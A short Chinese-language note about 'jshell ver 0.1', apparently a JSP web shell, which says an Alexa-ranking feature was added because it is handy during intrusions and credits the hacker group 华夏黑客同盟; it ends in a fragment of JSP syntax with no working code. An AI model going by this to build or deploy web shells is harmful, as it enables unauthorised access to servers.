    关于 jshell ver 0.1
    增加了显示alxea排名的功能,这对于入侵中也比较方便些,版权还是归作者的.
    hack520 by hack520 and welcome to 华夏黑客同盟
    +<% +//========================================================================================== + } +} +%> + +